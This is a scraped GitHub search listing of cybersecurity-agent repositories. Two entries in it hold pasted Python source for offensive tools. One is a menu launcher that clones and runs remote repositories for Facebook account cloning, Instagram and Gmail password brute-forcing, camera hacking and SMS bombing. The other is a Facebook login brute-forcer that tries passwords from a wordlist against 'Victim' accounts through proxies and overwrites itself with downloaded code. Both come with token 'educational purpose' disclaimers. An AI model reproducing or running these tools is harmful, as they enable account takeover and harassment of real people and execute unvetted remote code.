Found 1,025 repositories(showing 30)
westonbrown
AI agent for autonomous cyber operations
Warma10032
赛博医生项目——”赛博华佗“,基于多模态大模型的多功能智能体,一键搭建本地多模态大模型。接入医疗健康相关的知识图谱和知识库后可以进行疾病初诊,病历分析,专业知识问答等功能,成为你的私人医生。赛博华佗项目能帮助实现医疗资源的跨地域传播,让更多人借助大模型改善健康水平。"Cyber Huatuo" - Easy to build a personal doctor agent based on LLM and Knowledge Graph/Knowledge Database.
raphabot
No description available
NVISOsecurity
A collection of agents that use Large Language Models (LLMs) to perform tasks common on our day to day jobs in cyber security.
santosomar
This repository contains resources and materials for courses and presentations related to AI Agents and Agentic Systems for Cybersecurity Operations by Omar Santos.
glitchedgitz
A cyber security toolkit blending manual testing with AI Agents
microsoft
Benchmarking LLM agents on Cyber Threat Investigation.
amazon-science
Cyber-Zero: Training Cybersecurity Agents Without Runtime
cage-challenge
The TTCP CAGE Challenges are a series of public challenges instigated to foster the development of autonomous cyber defensive agents. This CAGE Challenge 4 (CC4) returns to a defence industry enterprise environment, and introduces a Multi-Agent Reinforcement Learning (MARL) scenario.
dstl
YAWNING TITAN is an abstract, graph based cyber-security simulation environment that supports the training of intelligent agents for autonomous cyber operations.
mrwadams
HoneyAgents is a PoC demo of an AI-driven system that combines honeypots with autonomous AI agents to detect and mitigate cyber threats. Features include intelligent threat analysis, automated deny list updates, and detailed natural language threat reports.
NatLabRockies
This repository is an Reinforcement Learning Platform for learning agents to control cyber-physical Power Distribution Systems resiliently. The cyber environment in based on SimPy Discrete Event Simulator, while the distribution system is backened by Open-DSS.
No description available
Kelechiodinakachi
#!/usr/bin/python2 #coding=utf-8 #The Credit For This Code Goes To lovehacker #If You Wanna Take Credits For This Code, Please Look Yourself Again... #Reserved2020 import os,sys,time,mechanize,itertools,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib from multiprocessing.pool import ThreadPool #### RANDOM Clour #### P = '\033[1;97m' # M = '\033[1;91m' # H = '\033[1;92m' # K = '\033[1;93m' # B = '\033[1;94m' # U = '\033[1;95m' # O = '\033[1;96m' # my_color = [P, M, H, K, B, U, O] warna = random.choice(my_color) warni = random.choice(my_color) def pkgs(): love("\033[1;91m«-----------------\033[1;96mSHABIR BALOCH\033[1;91m-----------------»") love("\033[1;96m«-----------------Disclaimer---------------»") love("\033[1;91m This Tool is for Educational Purpose") love("\033[1;93mThis presentation is for educational") love("\033[1;93mpurposes ONLY.How you use this information") love("\033[1;93mis your responsibility.I will not be") love("\033[1;93mheld accountable This Tool/Channel Doesn't") love("\033[1;93mSupport illegal activities.for any illegal") love("\033[1;93mActivitie This Tool is for Educational Purpose") love("\033[1;91m«------------------SHABIR BALOCH----------------»") love("\033[1;95mB4Baloch 2nd Tool Start ComingSoon New Update»") love("\033[1;96m «-----------------\033[1;92mSHABIR BALOCH\033[1;96m--------------»") time.sleep(0.3) os.system("pip install lolcat") try: import mechanize except ImportError: os.system("pip2 install mechanize") try: import requests except ImportError: os.system("pip2 install requests") os.system("python2 Cloning.py") from requests.exceptions import ConnectionError from mechanize import Browser from datetime import datetime reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')] os.system("clear") done = False def animate(): for c in itertools.cycle(['\033[1;96m|', '\033[1;92m/', '\033[1;95m-', '\033[1;91m\\']): if done: break sys.stdout.write('\r\033[1;93mLoading ' + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c ) sys.stdout.flush() time.sleep(0.001) t = threading.Thread(target=animate) t.start() time.sleep(5) done = True def keluar(): print "\033[1;97m{\033[1;91m!\033[1;97m} Keluar" os.sys.exit() def acak(x): w = 'mhkbpcP' d = '' for i in x: d += '!'+w[random.randint(0,len(w)-1)]+i return cetak(d) def cetak(x): w = 'mhkbpcP' for i in w: j = w.index(i) x= x.replace('!%s'%i,'%s;'%str(31+j)) x += '' x = x.replace('!0','') sys.stdout.write(x+'\n') def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.00001) ##### LOGO ##### logo = """ \033[1;96mPAK HACKERS░░░\033[1;92m░░░SHABIRBALOCH╗░░WEBDEVELOPER╗░AND╗░░A\033[1;91mETICALHACKER╗ \033[1;96mYT╔══M4╗B4║░\033[1;92m░░░░WEBHACKER╔══PAK╗ANONAYMOUS╔══YOUTUBE╗CHANNEL║\033[1;91m░B4_BALOCH_M4_MASTER╔╝ \033[1;96mPAKISTANI╦╝HACKERS\033[1;92m║░░░░░███████║██║░░╚═╝\033[1;91m█████═╝░ \033[1;96mWEBHACKER╔══SHABIRBALOCH╗\033[1;92m██║░░░░░██╔══██║██║░░\033[1;91m██╗██╔═██╗░ \033[1;96mWHATSAPP\033[1;92m╦╝03232132362╗██║░░██║╚█\033[1;91m████╔╝██║░╚██╗ \033[1;96m╚═══\033[1;92m══╝░╚══════╝╚═╝░░╚═╝\033[1;91m░╚════╝░╚═╝░░╚═╝ \033[1;96mHACK\033[1;92mTHE╗░░░HACKERS╗░BALOCH╗░HACKERS\033[1;91m████╗██╗░█████╗░ \033[1;96mWE\033[1;92mARE╗░LEGION║WE╔══NEVER╗\033[1;91mFORGIVE╔════╝SPEED█║LIMIT█╔══INCREASED█╗ \033[1;92mVISIT╔█OUR█╔YT║█CHANNEL█\033[1;91mB4║█BALOCH█╗░░M4║██MASTER██║ \033[1;92m██║╚██╔╝██║██╔\033[1;91m══██║██╔══╝░░██║██╔══██║ \033[1;92m██║░╚═╝░██║█\033[1;91m█║░░██║██║░░░░░██║██║░░██║ \033[1;92m╚═╝░░░░░╚═\033[1;91m╝╚═╝░░╚═╝╚═╝░░░░░╚═╝╚═╝░░╚═╝ \033[1;47m\033[1;31m PAKISTANI HACKER \033[1;0m \033[1;96m«-----------------\033[1;91mSHABIR BALOCH\033[1;96m-----------------» \033[1;91m ┈┈┈◢▇◣◢▇◣┈┈◢▇◣◢▇◣┈┈◢▇◣◢▇◣┈┈┈┈ BALOCH \033[1;91m ┈┈┈▇▇▇▇▇▇┈┈▇▇▇▇▇▇┈┈▇▇▇▇▇▇┈┈┈┈ HACKER \033[1;91m ┈┈┈◥▇▇▇▇◤┈┈◥▇▇▇▇◤┈┈◥▇▇▇▇◤┈┈┈┈ \033[1;91m ┈┈┈┈◥▇▇◤┈┈┈┈◥▇▇◤┈┈┈┈◥▇▇◤┈┈┈┈┈ WhatsApp \033[1;91m ┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈◥◤┈┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈◥◤┈┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈◥◤┈┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈┈ 03232132362 \033[1;96m«-----------------\033[1;91mBELLA\033[1;96m-----------------»""" R = '\033[1;91m' G = '\033[1;92m' Y = '\033[1;93m' B = '\033[1;94m' P = '\033[1;95m' S = '\033[1;96m' W = '\033[1;97m' ######Clear###### def clear(): os.system('clear') #### time sleep #### def t(): time.sleep(1) def t1(): time.sleep(0.01) #### print std #love### def love(z): for e in z + "\n": sys.stdout.write(e) sys.stdout.flush() t1() def menu(): os.system('clear') pkgs() os.system('clear') print(logo) os.system('clear') os.system('echo SHABIR░░░░░░BALOCH░░PAKISTANI░ETICAL░░HACKER | lolcat -a -F 0.1') os.system('echo SHABIR░░░░░BALOCH██WEB██DEVELOPER░██ | lolcat -a -F 0.1') os.system('echo WHATSAPP░░░░░03232132362░░FOR THIS SCRIPT░ | lolcat -a -F 0.1') os.system('echo CONTACT ░░░░░ME ON WHATSAPP░░BALOCH CYBER HACKER░ | lolcat -a -F 0.1') os.system('echo WE ARE ░░ANONAYMOUS░WE ARE LEGION WE NEVER GORFIVE | lolcat -a -F 0.1') os.system('echo WE NEVER FORGET░ASPECT ░░ US ░KNOWLEDGE░IS░░FREE | lolcat -a -F 0.1') os.system('echo HI, I AM SHABIR BALOCH A ETICAL HACKER | lolcat -a -F 0.1') os.system('echo WE ARE ANONYMOUS WE ARE LEGION WE NEVER FORGIVE WE NEVER FORGET ASPECT US | lolcat -a -F 0.1') os.system('echo SHABIR BALOCH WHATSAPP = 03232132362 | lolcat -a -F 0.1') os.system('echo VISIT OUR YOUTUBE CHANNEL B4 BALOCH M4 MASTER | lolcat -a -F 0.1') os.system('echo PAKISTANI ETICAL HACKER AND A PROGRAMMER | lolcat -a -F 0.1') os.system('echo LETS░░░░░ENJOY░░OUR░░░░░TOOL░░THANKS | lolcat -a -F 0.1') os.system('echo ------ Your Mind is Your Best Weapon------&&date | lolcat -a -F 0.1') os.system('echo ----------------BELLA-----------------| lolcat') os.system('echo ┈┈┈◢▇◣◢▇◣┈┈◢▇◣◢▇◣┈┈◢▇◣◢▇◣┈┈┈┈ SHABIR BALOCH| lolcat --animate') os.system('echo ┈┈┈▇▇▇▇▇▇┈┈▇▇▇▇▇▇┈┈▇▇▇▇▇▇┈┈┈┈ BALOCHHACKER| lolcat --animate') os.system('echo ┈┈┈◥▇▇▇▇◤┈┈◥▇▇▇▇◤┈┈◥▇▇▇▇◤┈┈┈┈| lolcat') os.system('echo ┈┈┈┈◥▇▇◤┈┈┈┈◥▇▇◤┈┈┈┈◥▇▇◤┈┈┈┈┈ WhatsApp| lolcat --animate') os.system('echo ┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈◥◤┈┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈◥◤┈┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈◥◤┈┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈┈03232132362| lolcat --animate') os.system('echo -----------------BELLA---------------| lolcat --animate') os.system('echo To return to this menu from any Tool| lolcat --animate') time.sleep(0.0005) os.system('echo Stop Process Press. CTRL + z| lolcat --animate') time.sleep(0.0005) os.system('echo Type python2 B4BALOCH.py| lolcat --animate') os.system('echo -----------------SHABIR BALOCH----------------| lolcat --animate') time.sleep(0.0005) os.system('echo [A] Install Random Mail Cloning--------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [B] Install Email Cloning--------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [C] Install Manual Password------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [D] Install Group Cloning--------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [E] Install With Out Fb Id-------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [F] Install Facebook Target------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [G] Install SpiderMan------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [H] Install Kalilinux------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [I] Install BlackHat-------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [J] Install RedMoonNew------------------------ Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [K] Install love3Hack3r----------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [L] Install B4 BALOCH Clonnig----------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [M] Install Web Admin Panel Finder------------ Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [N] Install Attacker-------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [O] Install Payload--------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [P] Install CamHacker------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [Q] Install Compiler-------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [R] Install Instagram Brut-------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [S] Install Marsh Base------------------------ Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [T] Install Gmail Target---------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [U] Install Termux Logo----------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [V] Install Termux TBomb---------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [W] B4 BALOCH M4 MASTER WhatsApp Group-------- Tool----● | lolcat --animate') time.sleep(0.0005) os.system('echo [X] BlackMafia Dragon404 New Update -----● | lolcat -a -F 0.01') time.sleep(0.0005) os.system('echo [Y] Tool Update--------------------------● | lolcat --animate') time.sleep(0.0005) os.system('echo [Z] EXIT | lolcat -a -F 0.1') time.sleep(0.0005) os.system('echo Slect Option A-Z➣➤| lolcat -a -F 0.1 ') mafia() def mafia(): black = raw_input('\033[1;91m┺\033[1;92m──\033[1;97m──\033[1;96m──\033[1;95m──\033[1;94m──\033[1;92m──\033[1;96m──━\033[1;93m➢\033[1;92m➣\033[1;91m➤') if black =="": print (" ShabirBaloch!") mafia() elif black =="A" or black =="a": clear() print(logo) os.system("rm -rf $HOME/random") clear() os.system("cd $HOME && git clone https://github.com/lovehacker404/random") print (logo) time.sleep(5) os.system("cd $HOME/random && python2 lovehacker.py") elif black =="B" or black =="b": clear() print(logo) os.system("rm -rf $HOME/email") os.system("cd $HOME && git clone https://github.com/lovehacker404/email") print (logo) time.sleep(5) os.system("cd $HOME/email && python2 lovehacker.py") elif black =="C" or black =="c": clear() print(logo) os.system("rm -rf BELLA/Password") os.system("cd $HOME && git clone https://github.com/lovehacker404/Password") print (logo) time.sleep(5) os.system("cd BELLA/Password && python2 lovehacker.py") elif black =="D" or black =="d": clear() print(logo) os.system("rm -rf BELLA/lovehack") os.system("cd $HOME && git clone https://github.com/lovehacker404/lovehack") print (logo) time.sleep(5) os.system("cd $HOME/lovehack && python2 lovehacker.py") elif black =="E" or black =="e": clear() print(logo) os.system("rm -rf $HOME/402") os.system("cd $HOME && git clone https://github.com/lovehacker404/402") print (logo) love("\033[1;93mTool User Name :\033[1;95m BELLA ") love("\033[1;93mTool Password :\033[1;95m BELLA") time.sleep(5) os.system("cd $HOME/402 && python2 Cloningx-2-1.py") elif black =="F" or black =="f": clear() print(logo) os.system("rm -rf $HOME/blackhole") os.system("cd $HOME && git clone https://github.com/lovehacker404/blackhole") print (logo) love("\033[1;93mTool User Name :\033[1;95m Black ") love("\033[1;93mTool Password :\033[1;95m Mafia ") love("\033[1;93m :Target Attack : ") love("\033[1;93mPassword list :\033[1;95mlovehacker-2.txt ") time.sleep(5) os.system("cd $HOME/blackhole && python2 AsifJaved.py") elif black =="G" or black =="g": clear() print(logo) os.system("rm -rf $HOME/Spider") os.system("cd $HOME && git clone https://github.com/lovehacker404/Spider") print (logo) love("\033[1;91mCongratulations Cobra Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;93mTool User Name SpiderMan Password lovehacker") time.sleep(5) os.system("cd $HOME/Spider && python2 SpiderMan.py") elif black =="H" or black =="h": clear() print(logo) os.system("rm -rf $HOME/KaliIndia") os.system("cd $HOME && git clone https://github.com/lovehacker404/KaliIndia") print (logo) love("\033[1;96mCongratulations BlackMafia Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;93mTool User Name India Password lovehacker") time.sleep(5) os.system("cd $HOME/KaliIndia && python2 kalilinux.India.py") elif black =="I" or black =="i": clear() print(logo) os.system("rm -rf $HOME/BlackHat") os.system("cd $HOME && git clone https://github.com/lovehacker404/BlackHat") print (logo) love("\033[1;96mCongratulations BlackHat Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;93mTool User Name BlackHat Password lovehacker") time.sleep(5) os.system("cd $HOME/BlackHat && python2 BlackHat.py") elif black =="J" or black =="j": clear() print(logo) print(logo) os.system("rm -rf $HOME/RedMoonNew") os.system("cd $HOME && git clone https://github.com/lovehacker404/RedMoonNew") print (logo) love("\033[1;91mCongratulations RedMoonNew Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;93mTool User Name\033[1;92m RedMoonNew\033[1;93m Password \033[1;92mlovehacker") time.sleep(6) os.system("cd $HOME/RedMoonNew && python2 lovehacker") elif black =="K" or black =="k": clear() print(logo) print(logo) os.system("rm -rf $HOME/lov3Hak3r") os.system("cd $HOME && git clone https://github.com/lovehacker404/lov3Hak3r") print (logo) love("\033[1;96mCongratulations BlackMafia Tool Has Been Installed Successfully") love("Now you can open this tool as usual") time.sleep(5) os.system("cd $HOME/lov3Hak3r && python2 lovehacker.py") elif black =="L" or black =="l": clear() print(logo) print(logo) os.system("rm -rf $HOME/B4_BALOCH") os.system("cd $HOME && git clone https://github.com/shabirbaloch398/B4_BALOCH.git") print (logo) love("\033[1;93mCongratulations Cobra Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;95mTool Dont Have Username And Password Enjoy But Use 786786 Pass Or Username On My Tool Thanks") time.sleep(5) os.system("cd $HOME/Cobra && python2 Scorpion.py") elif black =="M" or black =="m": clear() print(logo) print(logo) os.system("rm -rf $HOME/attack911") os.system("cd $HOME && git clone https://github.com/shabirbaloch398/attack911.git") print (logo) love("\033[1;91mCongratulations attack911 Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;96mAdmin Panel Finder") time.sleep(5) os.system("cd $HOME/attack911 && python2 attack911.py") elif black =="N" or black =="n": clear() print(logo) print(logo) os.system("rm -rf $HOME/Attacker") os.system("cd $HOME && git clone https://github.com/shabirbaloch398/Attacker.git") print (logo) love("\033[1;96mCongratulations Attacker Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;92mBest Script") time.sleep(5) os.system("cd $HOME/Attacker && python2 B4.py") elif black =="O" or black =="o": clear() print(logo) print(logo) os.system("pkg install unstable-repo") os.system("pkg install metasploit") os.system("pkg install msfconsole") os.system("rm -rf $HOME/Black_Mafia") os.system("cd $HOME && git clone https://github.com/lovehacker404/Black_Mafia") print (logo) love("\033[1;93mCongratulations Black_Mafia Payload Tool Has Been Installed Successfully") love("Now you can open this tool as usual") time.sleep(5) os.system("cd $HOME/Black_Mafia && python3 Black_Mafia.py") elif black =="P" or black =="p": clear() print(logo) print(logo) os.system("rm -rf $HOME/Pak") os.system("cd $HOME && git clone https://github.com/lovehacker404/Pak") print (logo) love("\033[1;96mCongratulations CamHacker Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;92mEducational Perpose only") time.sleep(2) os.system("cd $HOME/Pak && python lovehacker.py") elif black =="Q" or black =="q": clear() print(logo) os.system("rm -rf $HOME/Compile") os.system("cd $HOME && git clone https://github.com/lovehacker404/Compile") print (logo) love("\033[1;93mCongratulations Tool Has Been Update Successfully") love("Now you can open this tool as usual") time.sleep(5) os.system("cd $HOME/Compile && python2 lovehacker.py") elif black =="R" or black =="r": clear() print(logo) print(logo) os.system("pip2 install bs4") os.system("rm -rf $HOME/Insta") os.system("cd $HOME && git clone https://github.com/lovehacker404/Insta") print (logo) love("\033[1;93mCongratulations Tool Has Been Update Successfully") love("Now you can open this tool as usual") love("Passwordlist No1 (wordlist.txt) No2 (BlackMafia.txt)") time.sleep(5) os.system("cd $HOME/Insta && python2 lovehacker.py") elif black =="S" or black =="s": clear() print(logo) os.system("rm -rf $HOME/TimePass") os.system("cd $HOME && git clone https://github.com/lovehacker404/TimePass") print (logo) love("\033[1;93mCongratulations Tool Has Been Update Successfully") love("Now you can open this tool as usual") time.sleep(5) os.system("cd $HOME/TimePass && python2 lovehacker.py") elif black =="T" or black =="t": clear() print(logo) print(logo) os.system("rm -rf $HOME/GmailAttack") os.system("cd $HOME && git clone https://github.com/lovehacker404/GmailAttack") print (logo) love("\033[1;96mCongratulations GmailAttack Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("plz wi8 Password list name (lovehacker-1.txt) ") time.sleep(6) os.system("cd $HOME/GmailAttack && python2 lovehacker.py") elif black =="U" or black =="u": clear() print(logo) print(logo) os.system("rm -rf $HOME/Logo") os.system("cd $HOME && git clone https://github.com/lovehacker404/Logo") print (logo) love("\033[1;96mCongratulations BlackMafia Logo Tool Has Been Installed Successfully") love("Now you can open this tool as usual") time.sleep(5) os.system("cd $HOME/Logo && bash lovehacker.sh") elif black =="V" or black =="v": clear() print(logo) os.system("rm -rf $HOME/sms") os.system("cd $HOME && git clone https://github.com/lovehacker404/sms") print (logo) love("\033[1;96mCongratulations BlackMafia TBomb Tool Has Been Installed Successfully") love("Now you can open this tool as usual") time.sleep(5) os.system("cd $HOME/sms && bash BlackMafia.sh") elif black =="W" or black =="w": clear() print(logo) love("Welcome To B4 BALOCH M4 MASTER WhatsApp Group") time.sleep(5) os.system('xdg-open https://chat.whatsapp.com/BcmyQPBz6lz3t6oVN8wLoi') elif black =="X" or black =="x": clear() print(logo) love("Welcome To B4 BALOCH 2nd Tool") love("BlackMafia 2nd Tool Start") love("Coming Soon New Update") time.sleep(5) os.system("rm -rf $HOME/Dragon404") os.system("cd $HOME && git clone https://github.com/lovehacker404/Dragon404") print (logo) love("\033[1;96mCongratulations Dragon404 Tool Has Been Installed Successfully") love("Wellcom to Dragon404 tool") os.system("cd $HOME/Dragon404 && python2 lovehacker.py") elif black =="Y" or black =="y": clear() print(logo) os.system("rm -rf $HOME/World") os.system("pip install lolcat") os.system("cd $HOME && git clone https://github.com/lovehacker404/World") print (logo) love("\033[1;96mCongratulations BlackMafia Tool Has Been Update Successfully") time.sleep(5) os.system("cd $HOME/World && python2 Cloning.py") elif black =="Z" or black =="z": os.system("exit") if __name__ == "__main__": menu()
tsinghua-fib-lab
The official repository of "SmartAgent: Chain-of-User-Thought for Embodied Personalized Agent in Cyber World".
UKGovernmentBEIS
An Inspect extension for agentic cyber evaluations
Oluwakemi2000
A modular, agentic-AI-based adaptive cybersecurity architecture for digital ecosystems. Combines Zero Trust, real-time telemetry, and intelligent threat response. Built for researchers, developers, and AI security enthusiasts.#AI, #Cybersecurity, #AgenticAI, #IoT.
FatimaKabali
#!/usr/bin/python import socket, sys, os, re, random, optparse, time if sys.version_info.major <= 2:import httplib else:import http.client as httplib ## COLORS ############### wi="\033[1;37m" #>>White# rd="\033[1;31m" #>Red # gr="\033[1;32m" #>Green # yl="\033[1;33m" #>Yellow# ######################### os.system("cls||clear") def write(text): sys.stdout.write(text) sys.stdout.flush() versionPath = "core"+os.sep+"version.txt" errMsg = lambda msg: write(rd+"\n["+yl+"!"+rd+"] Error: "+yl+msg+rd+ " !!!\n"+wi) try:import requests except ImportError: errMsg("[ requests ] module is missing") print(" [*] Please Use: 'pip install requests' to install it :)") sys.exit(1) try:import mechanize except ImportError: errMsg("[ mechanize ] module is missing") print(" [*] Please Use: 'pip install mechanize' to install it :)") sys.exit(1) class FaceBoom(object): def __init__(self): self.useProxy = None self.br = mechanize.Browser() self.br.set_handle_robots(False) self.br._factory.is_html = True self.br.addheaders=[('User-agent',random.choice([ 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) RockMelt/0.9.58.494 Chrome/11.0.696.71 Safari/534.24', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2', 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6', 'Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20121202 Firefox/17.0 Iceweasel/17.0.1']))] @staticmethod def check_proxy(proxy): proxies = {'https':"https://"+proxy, 'http':"http://"+proxy} proxy_ip = proxy.split(":")[0] try: r = requests.get('https://www.wikipedia.org',proxies=proxies, timeout=5) if proxy_ip==r.headers['X-Client-IP']: return True return False except Exception : return False @staticmethod def cnet(): try: socket.create_connection((socket.gethostbyname("www.google.com"), 80), 2) return True except socket.error:pass return False def get_profile_id(self, target_profile): try: print(gr+"\n["+wi+"*"+gr+"] geting target Profile Id... please wait"+wi) idre = re.compile('"entity_id":"([0-9]+)"') con = requests.get(target_profile).text idis = idre.findall(con) print(wi+"\n["+gr+"+"+wi+"]"+gr+" Target Profile"+wi+" ID: "+yl+idis[0]+wi) except IndexError: errMsg("Please Check Your Victim's Profile URL") sys.exit(1) def login(self,target, password): try: self.br.open("https://facebook.com") self.br.select_form(nr=0) self.br.form['email']=target self.br.form['pass']= password self.br.method ="POST" if self.br.submit().get_data().__contains__(b'home_icon'):return 1 elif "checkpoint" in self.br.geturl(): return 2 return 0 except(KeyboardInterrupt, EOFError): print(rd+"\n["+yl+"!"+rd+"]"+yl+" Aborting"+rd+"..."+wi) time.sleep(1.5) sys.exit(1) except Exception as e: print(rd+" Error: "+yl+str(e)+wi+"\n") time.sleep(0.60) def banner(self,target,wordlist,single_passwd): proxystatus = gr+self.useProxy+wi+"["+gr+"ON"+wi+"]" if self.useProxy else yl+"["+rd+"OFF"+yl+"]" print(gr+""" ================================== [---] """+wi+"""*CYBER_ROCKY*"""+gr+""" [---] ================================== [---] """+wi+"""Facebook-Hack-BD """+gr+""" [---] ================================== [---] """+yl+"""CONFIG"""+gr+""" [---] ================================== [>] Target :> """+wi+target+gr+""" {}""".format("[>] Wordlist :> "+yl+str(wordlist) if not single_passwd else "[>] Password :> "+yl+str(single_passwd))+gr+""" [>] ProxyStatus :> """+str(proxystatus)+wi) if not single_passwd: print(gr+"""\ =================================="""+wi+""" [~] """+yl+"""Facebook-"""+rd+"""Password-Attack: """+gr+"""Enabled """+wi+"""[~]"""+gr+""" ==================================\n"""+wi) else:print("\n") @staticmethod def updateFaceBoom(): if not os.path.isfile(versionPath): errMsg("Unable to check for updates: please re-clone the script to fix this problem") sys.exit(1) write("[~] Checking for updates...\n") conn = httplib.HTTPSConnection("raw.githubusercontent.com") conn.request("GET", "/Oseid/FaceBoom/master/core/version.txt") repoVersion = conn.getresponse().read().strip().decode() with open(versionPath) as vf: currentVersion = vf.read().strip() if repoVersion == currentVersion:write(" [*] The script is up to date!\n") else: print(" [+] An update has been found ::: Updating... ") conn.request("GET", "/Oseid/FaceBoom/master/faceboom.py") newCode = conn.getresponse().read().strip().decode() with open("faceboom.py", "w") as faceBoomScript: faceBoomScript.write(newCode) with open(versionPath, "w") as ver: ver.write(repoVersion) write(" [+] Successfully updated :)\n") parse = optparse.OptionParser(wi+""" Usage: python fb-hack-bd.py [OPTIONS...] ------------- OPTIONS: |Facebook-account💀Hacking💀Tools. ____ _ ____ _ / ___| _| |__ ___ _ __ | _ \ ___ ___| | ___ _ | | | | | | '_ \ / _ \ '__|____| |_) / _ \ / __| |/ / | | | | |__| |_| | |_) | __/ | |_____| _ < (_) | (__| <| |_| | \____\__, |_.__/ \___|_| |_| \_\___/ \___|_|\_\\__, | |___/ |___/ ............................................................ This is ***Cyber-Rocky*** Password Attack Tools. .....Made in Bangladesh..... |-------- | -t <target email> [OR] <FACEBOOK ID> ::> Specify target Email [OR] Target Profile ID |-------- | -w <wordlist Path> ::> Specify Wordlist File Path |-------- | -s <single password> ::> Specify Single Password To Check |-------- | -p <Proxy IP:PORT> ::> Specify HTTP/S Proxy (Optional) |-------- | -g <TARGET Facebook Profile URL> ::> Specify Target Facebook Profile URL For Get HIS ID |-------- | -u/--update ::> Update FaceBoom Script ------------- Examples: | |-------- |1/ python fb-hack-bd.py -t Victim@gmail.com -w /usr/share/wordlists/rockyou.txt |-------- |*2/ python fb-hack-bd.py -t 100001013078780 -w /data/data/com.termux/files/home/password.txt |-------- |3/ python fb-hack-bd.py -t Victim@hotmail.com -w \wordlist.txt -p 144.217.101.245:3129 |-------- |4/ python fb-hack-bd.py -t Victim@gmail.com -s 1234567 |-------- |5/ python fb-hack-bd.py -g https://www.facebook.com/Victim_Profile |-------- """) def Main(): parse.add_option("-t","--target",'-T','--TARGET',dest="target",type="string", help="Specify Target Email or ID") parse.add_option("-w","--wordlist",'-W','--WORDLIST',dest="wordlist",type="string", help="Specify Wordlist File ") parse.add_option("-s","--single","--S","--SINGLE",dest="single",type="string", help="Specify Single Password To Check it") parse.add_option("-p","-P","--proxy","--PROXY",dest="proxy",type="string", help="Specify HTTP/S Proxy to be used") parse.add_option("-g","-G","--getid","--GETID",dest="url",type="string", help="Specify TARGET FACEBOOK PROFILE URL to get his ID") parse.add_option("-u","-U","--update","--UPDATE", dest="update", action="store_true", default=False) (options,args) = parse.parse_args() faceboom = FaceBoom() target = options.target wordlist = options.wordlist single_passwd = options.single proxy = options.proxy 